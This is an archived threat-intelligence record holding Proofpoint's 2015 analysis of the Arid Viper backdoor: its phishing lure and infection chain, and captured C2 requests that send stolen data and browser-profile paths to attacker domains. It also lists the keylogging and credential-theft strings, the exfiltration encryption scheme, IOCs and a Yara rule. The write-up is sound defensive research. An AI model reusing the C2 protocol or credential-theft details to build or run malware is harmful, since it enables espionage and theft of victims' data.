{
	"id": "92e33255-1864-4fe2-8198-09f1d1d57da8",
	"created_at": "2026-04-06T00:13:49.693809Z",
	"updated_at": "2026-04-10T03:32:05.062112Z",
	"deleted_at": null,
	"sha1_hash": "efd5f7767010b9682d2ecaae6f2704e3914f1558",
	"title": "Operation Arid Viper Slithers Back into View | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 256667,
	"plain_text": "Operation Arid Viper Slithers Back into View | Proofpoint US\r\nBy Proofpoint Staff, September 18, 2015\r\nPublished: 2015-09-18 · Archived: 2026-04-02 11:31:59 UTC\r\nEarlier this year, researchers published analyses of a targeted attack known as Operation Arid Viper [1] (aka Desert Falcons [2], aka DHS), directed primarily at organizations in the Middle East. Delivering a backdoor and spyware, this campaign was designed to steal information from infected systems using a malware client capable of filtering out “uninteresting” files, and spread primarily via a targeted phishing email usually promising a pornographic video.\r\nThe infection chain described in the initial analyses was fairly straightforward: to access the video content, the recipient had to open an attached RAR archive file – or, less frequently, click a link to a RAR – that extracted an SCR (Windows screensaver) file, which in turn dropped two files: a malicious EXE with the name of a legitimate file (such as “skype.exe”), and a video file, usually FLV or MPG.\r\nDespite the apparent severity and extent of this threat, little has been written about it in the intervening months, and the operation appeared to be dormant. However, Proofpoint researchers recently intercepted and analyzed phishing emails distributing Arid Viper malware payloads with some noteworthy updates.\r\nAs with the originally documented examples, these messages were part of narrow campaigns targeting specific industry verticals: telecoms, high tech, and business services, primarily in Israel.\r\nIn these samples, the spear-phishing email contained a link to a RAR file hosted on MediaFire – no attachments were observed. 
Instead of a pornographic video, the actors showed a change in TTP by using as a lure a video of a fiery automobile accident. The lure text read:\r\nRoad accident // התאונה בכביש\r\nShocking video leaked to the media // וידיו מזעזע דלפ תקשורת\r\nClicking the linked RAR brings up a prompt to download the file “this.morning.rar” to the recipient's computer. (Fig. 1)\r\nhttps://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View\r\nPage 1 of 15\r\n\r\nFigure 1: Prompt to download RAR to local system\r\nThe file “this.morning” is a RAR self-extracting (SFX) archive (cd89897a2b6946a332354e0609c0b8b4). Once downloaded, the user opens the RAR, which extracts what appears to be a video file named “this.morning”. In fact, double-clicking the RAR SFX extracts and executes two files contained in this archive:\r\n- A non-malicious video file: this.morning.flv (41bf348254b921bbd21350a70f843683)\r\n- The malware payload: chrome.exe (2ae0f580728c43b3a3888dfbe76ad689)\r\nIn this regard, the infection chain is still similar to that described in the original Operation Arid Viper analysis, but with noticeable changes to the filenames and email lure, among others. The end user sees the promised video while, in the background, the malicious “chrome.exe” begins its communication with the command and control (C2) server. In both cases the action is automatic and initiated simply by double-clicking the self-extracting RAR (SFX) archive, with no further interaction by the end user needed. The following is an example of the initial C2 beacon:\r\nGET /Sounds/sound_q.php?p=—[redacted]. HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: AudioDrive\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: oowdesign[.]
com\r\nCache-Control: no-cache\r\nAnd this is an example of the C2 server response:\r\nHTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Wed, 26 Aug 2015 14:11:52 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nX-Powered-By: PHP/5.3.29\r\na\r\n.\r\nyes;\r\n0\r\nThe malware payload still uses the type of hard drive and a set of numbers as a unique identifier; for example: VMware-VMwareVirtualSSCSIDisk—[redacted]. Moreover, the malware compile time appears to be quite recent. (Fig. 2)\r\nFigure 2: Malware file details showing compile date\r\nThe Trojan continues to exhibit its behavior of downloading an update following the first C2 communication, and in this case Proofpoint researchers succeeded in patching the initial malware to obtain the second-stage malware payload (3a401a679d147b070eb8ccae5df3dc43), which allowed us to observe more activities.\r\nPreviously described as the Operation Arid Viper backdoor, the second-stage payload was observed in traffic to be obfuscated with standard base64 encoding. The second-stage backdoor has a compile date nearly a day earlier than the first-stage malware. (Fig. 
3)\r\nFigure 3: Malware file details showing compile date\r\nDuring the infection process, the Arid Viper malware makes multiple HTTP GET requests to register the client with the server and check for updates:\r\nGET /designs/new_user.php?s1=[---UID---]&s2=8 HTTP/1.1 -> call PHP script to login / register the infe\r\nGET /designs/is_ok.php?s1=[---UID---] HTTP/1.1 -> call PHP script to perform a user check on the serve\r\nGET /designs/add_recoord.php?s1=[---UID---]&s2=8&s3=2[---Date---]&s4=msn -> call PHP script to add a\r\nGET /designs/get_t.php?s1=[---UID---]&s2=[---Date---]\r\nGET /designs/add_t.php?s1=[---UID---]&s2=[---Date---]\r\nGET /designs/get_r.php?s1=[---UID---]\r\nIn addition, the backdoor POSTs data back to the server:\r\nPOST /designs/drive_update.php HTTP/1.1 -> encrypted data wrapped in a custom base64 encoding is sent\r\nUser-Agent: Realtek\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: smilydesign[.]com\r\nContent-Length: 978\r\nPragma: no-cache\r\nThe Arid Viper backdoor also sends GETs to confirm the existence of interesting data / files, with the path and filenames included in the request. 
The following exchanges show the GET request (with filename and path in the query string) and the C2 server response (i.e., “OK”):\r\nGET /designs/send_request_r_data.php?s1=[redacted]&path=C:/Users/COMPUTER/AppData/Roaming/Mozilla/Fi\r\nAccept: text/*\r\nUser-Agent: Realtek\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: smilydesign[.]com\r\nCache-Control: no-cache\r\nHTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Thu, 27 Aug 2015 11:48:19 GMT\r\nContent-Type: text/html\r\nContent-Length: 7\r\nConnection: keep-alive\r\nKeep-Alive: timeout=60\r\nX-Powered-By: PHP/5.3.10-1ubuntu3.17\r\nVary: Accept-Encoding\r\ndone\r\nGET /designs/send_request_r_data.php?s1=[redacted]&path=C:/Users/COMPUTER/AppData/Roaming/Mozilla/Fi\r\nAccept: text/*\r\nUser-Agent: Realtek\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: smilydesign[.]
com\r\nCache-Control: no-cache\r\nHTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Thu, 27 Aug 2015 11:48:19 GMT\r\nContent-Type: text/html\r\nContent-Length: 7\r\nConnection: keep-alive\r\nKeep-Alive: timeout=60\r\nX-Powered-By: PHP/5.3.10-1ubuntu3.17\r\nVary: Accept-Encoding\r\ndone\r\nIn addition, analysis of the Arid Viper backdoor binary shows evidence of keylogging capabilities:\r\n00000006E2C4 00000046F2C4 0 [The Right KeyPressed]\r\n00000006E2F4 00000046F2F4 0 [The LeFT Key Pressed]\r\n00000006E324 00000046F324 0 [The Down Key Is Pressed]\r\n00000006E358 00000046F358 0 [The Up Key Is Pressed]\r\n00000006E388 00000046F388 0 [left alt+shift]\r\n00000006E3AC 00000046F3AC 0 [right alt+shift]\r\n00000006E3D0 00000046F3D0 0 [Caps Lock]\r\n00000006E3E8 00000046F3E8 0 [Tab Pressed]\r\n00000006E404 00000046F404 0 [Back space Pressed...]\r\nAs well as the ability to steal browser data:\r\n00000006DC30 00000046EC30 0 \\logins.json\r\n00000006DC40 00000046EC40 0 \\key3.db\r\n00000006DC4C 00000046EC4C 0 \\Mozilla\\Firefox\\Profiles\\\r\n00000006DC68 00000046EC68 0 .default\r\n00000006DC74 00000046EC74 0 \\Mozilla\\Firefox\\Profiles\\*.*\r\n00000006DC94 00000046EC94 0 \\Google\\Chrome\\User Data\\Default\\Login Data\r\n00000006DCE9 00000046ECE9 0 Username: %ws\r\n00000006DCF8 00000046ECF8 0 Password: %ws\r\n00000006DD0C 00000046ED0C 0 Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2\r\nThe Arid Viper backdoor encrypts data to be exfiltrated in order to avoid detection, and after additional analysis Proofpoint researchers succeeded in determining its encryption routine.\r\nData Exfiltration\r\nThe updated data exfiltration of the new Arid Viper backdoor functions similarly to previously documented versions. 
The table below lists some of the different functionalities paired with the actor-assigned indicator, which can be seen both in the HTTP client body along with the exfiltrated data and in the URI once exfiltration is complete. (Table 1)\r\nExfiltration type | Description\r\nmsn   | Computer name, user name, and Windows Live credentials (if found) are exfiltrated as plaintext data before encryption.\r\ntree  | A “directory tree” of files and directories. This is stored compressed in a password-protected zip.\r\nlog   | A keylog containing a list of programs and the keystrokes recorded in each program. This file is transmitted in a password-protected zip.\r\nrfile | A password-protected zip containing the exfiltrated file, named file.dll, as well as a text file (name.txt) containing the original full path and name of the exfiltrated file.\r\nimg   | Screenshots are taken every ~5 minutes in the initial function. Several screenshots are then compressed into a password-protected zip file.\r\nTable 1: Arid Viper exfiltration types and descriptions\r\nCaptured C2 traffic provides an example of the network traffic seen during an msn data exfiltration. (Fig. 4)\r\nFigure 4: Example network traffic during data exfiltration\r\nAlthough the data that is exfiltrated and the manner in which it is gathered remain largely the same as in previously documented versions, the final result that is transmitted to an attacker-controlled server has changed significantly. In an older version of this backdoor (md5: aefea9d795624da16d878dc9bb81bf87), exfiltrated data was simply base64-encoded using a slightly modified base64 alphabet (“-” instead of “+”). In the newer version, prior to base64 encoding, the exfiltrated data is first encrypted with AES-256 in CBC mode. 
The encryption process is depicted in Figure 5 and explained below.\r\nFigure 5: Arid Viper encryption process for data exfiltration\r\nTo generate the key/IV pair, the malware first randomly generates 60 bytes of data. From this, the first 32 bytes are used as the key, the next byte is skipped, and the following 16 bytes are used as the IV. After encryption, the key, separator byte, IV, leftover bytes and padding are encoded into a 512-byte block of data and prepended to the encrypted data. The encoded key/IV block and the encrypted data are then base64-encoded using the same modified alphabet. Just like in the older version, this data is then appended to the final variable in the POST’s HTTP client body and sent to an attacker-controlled server.\r\nReinventing the wheel\r\nNumerous examples over the years have served to remind us that designing your own cryptography implementation is difficult and usually ill-advised. The authors of the updated Arid Viper backdoor seem to have overlooked this lesson: although certain measures have been taken to protect the generated secret keys and IVs, their implementation is susceptible to a brute force attack, often capable of finding the correct key/IV combination in less than one second. Cracking the encryption scheme applied to the traffic in Figure 4 reveals the following decrypted cleartext. (Fig. 
6)\r\nFigure 6: Decrypted data from example network traffic in Figure 4\r\nDetermining the encryption scheme applied to the updated Arid Viper backdoor’s exfiltrated data enables us to better detect C2 communication while also rapidly determining the extent and impact of the data breach carried out by the malware client.\r\nConclusion\r\nIn summary, this update to Operation Arid Viper demonstrates that, despite its relatively low profile since February, the Arid Viper / Desert Falcons threat still has teeth and remains a risk for organizations in Israel and elsewhere. While the overall attack profile observed in recent examples remains similar to the originally documented campaigns, the recent campaigns exhibit several important updates:\r\n- Use of links instead of attachments\r\n- New lures: still using pornographic video, but the most recent detections also included lures for auto accident footage\r\n- New executable name: originally reported using “skype.exe” (and variations on “skype”), the recent samples used “chrome.exe”\r\n- New C2 domains\r\n- Added encryption for exfiltrated data\r\nThe return of Operation Arid Viper shows that targeted attacks can remain a threat even – and especially – when they are no longer in the headlines.\r\nReferences\r\n[1] http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-arid-viper.pdf\r\n[2] https://securelist.com/blog/research/68817/the-desert-falcons-targeted-attacks/\r\nIndicators of Compromise (IOCs)\r\nObserved C2 domains and IP addresses:\r\nsmilydesign[.]com / 195.154.252.2\r\nyalladesign[.]net / 173.236.89.19\r\noowdesign[.]com / 195.154.133.228\r\ncoldydesign[.]
com / 195.154.252.2\r\nAttachment and payload hashes for this sample:\r\nthis.morning.rar - cd89897a2b6946a332354e0609c0b8b4\r\nthis.morning.exe - 2ae0f580728c43b3a3888dfbe76ad689\r\nRtlUpd.exe - 3a401a679d147b070eb8ccae5df3dc43\r\nAttachment and payload hashes for all campaigns observed since July 1:\r\nFiles and paths indicating infection:\r\nDetection\r\nThe following Yara rule can detect the updated Arid Viper backdoor traffic:\r\nrule AVIDVIPER_APT_BACKDOOR {\r\n    meta:\r\n        author = \"Proofpoint Staff\"\r\n        info = \"avid viper update\"\r\n    strings:\r\n        $s1 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-/\"\r\n        $s2 = \"SELECT * FROM Win32_DiskDrive\" wide ascii\r\n        $s3 = \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" wide ascii\r\n        $s4 = \"\\\\dd\\\\vctools\\\\vc7libs\\\\ship\\\\atlmfc\" wide ascii\r\n    condition:\r\n        $s4 and 2 of ($s1,$s2,$s3)\r\n}\r\nIn addition, Proofpoint Emerging Threats (ET) has a variety of signatures for detecting older and updated versions of Arid Viper and Desert Falcons.\r\nArid Viper:\r\nET Open signatures: 2020431-2020454\r\nET Pro signatures: 2812701, 2812729\r\nDesert Falcon:\r\nET Open: 2020459, 2020461, 2020462, 2020464-2020469, 2020472\r\nSource: https://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View"
	],
	"report_names": [
		"Operation-Arid-Viper-Slithers-Back-Into-View"
	],
	"threat_actors": [
		{
			"id": "9ff60d4d-153b-4ed5-a2f7-18a21d2fa05d",
			"created_at": "2022-10-25T16:07:23.539852Z",
			"updated_at": "2026-04-10T02:00:04.647734Z",
			"deleted_at": null,
			"main_name": "Desert Falcons",
			"aliases": [
				"APT-C-23",
				"ATK 66",
				"Arid Viper",
				"Niobium",
				"Operation Arid Viper",
				"Operation Bearded Barbie",
				"Operation Rebound",
				"Pinstripe Lightning",
				"Renegade Jackal",
				"TAG-63",
				"TAG-CT1",
				"Two-tailed Scorpion"
			],
			"source_name": "ETDA:Desert Falcons",
			"tools": [
				"AridSpy",
				"Barb(ie) Downloader",
				"BarbWire",
				"Desert Scorpion",
				"FrozenCell",
				"GlanceLove",
				"GnatSpy",
				"KasperAgent",
				"Micropsia",
				"PyMICROPSIA",
				"SpyC23",
				"Viper RAT",
				"ViperRAT",
				"VolatileVenom",
				"WinkChat",
				"android.micropsia"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b1979c55-037a-415f-b0a3-cab7933f5cd4",
			"created_at": "2024-04-24T02:00:49.561432Z",
			"updated_at": "2026-04-10T02:00:05.416794Z",
			"deleted_at": null,
			"main_name": "APT-C-23",
			"aliases": [
				"APT-C-23",
				"Arid Viper",
				"Desert Falcon",
				"TAG-63",
				"Grey Karkadann",
				"Big Bang APT",
				"Two-tailed Scorpion"
			],
			"source_name": "MITRE:APT-C-23",
			"tools": [
				"Micropsia"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "929d794b-0e1d-4d10-93a6-29408a527cc2",
			"created_at": "2023-01-06T13:46:38.70844Z",
			"updated_at": "2026-04-10T02:00:03.075002Z",
			"deleted_at": null,
			"main_name": "AridViper",
			"aliases": [
				"Desert Falcon",
				"Arid Viper",
				"APT-C-23",
				"Bearded Barbie",
				"Two-tailed Scorpion"
			],
			"source_name": "MISPGALAXY:AridViper",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e5cad6bf-fa91-4128-ba0d-2bf3ff3c6c6b",
			"created_at": "2025-08-07T02:03:24.53077Z",
			"updated_at": "2026-04-10T02:00:03.680525Z",
			"deleted_at": null,
			"main_name": "ALUMINUM SARATOGA",
			"aliases": [
				"APT-C-23",
				"Arid Viper",
				"Desert Falcon",
				"Extreme Jackal ",
				"Gaza Cybergang",
				"Molerats ",
				"Operation DustySky ",
				"TA402"
			],
			"source_name": "Secureworks:ALUMINUM SARATOGA",
			"tools": [
				"BlackShades",
				"BrittleBush",
				"DarkComet",
				"LastConn",
				"Micropsia",
				"NimbleMamba",
				"PoisonIvy",
				"QuasarRAT",
				"XtremeRat"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "35b3e533-7483-4f07-894e-2bb3ac855207",
			"created_at": "2025-08-07T02:03:24.540035Z",
			"updated_at": "2026-04-10T02:00:03.69627Z",
			"deleted_at": null,
			"main_name": "ALUMINUM SHADYSIDE",
			"aliases": [
				"APT-C-23 ",
				"Arid Viper ",
				"Desert Falcon "
			],
			"source_name": "Secureworks:ALUMINUM SHADYSIDE",
			"tools": [
				"Micropsia",
				"SpyC23"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434429,
	"ts_updated_at": 1775791925,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/efd5f7767010b9682d2ecaae6f2704e3914f1558.pdf",
		"text": "https://archive.orkl.eu/efd5f7767010b9682d2ecaae6f2704e3914f1558.txt",
		"img": "https://archive.orkl.eu/efd5f7767010b9682d2ecaae6f2704e3914f1558.jpg"
	}
}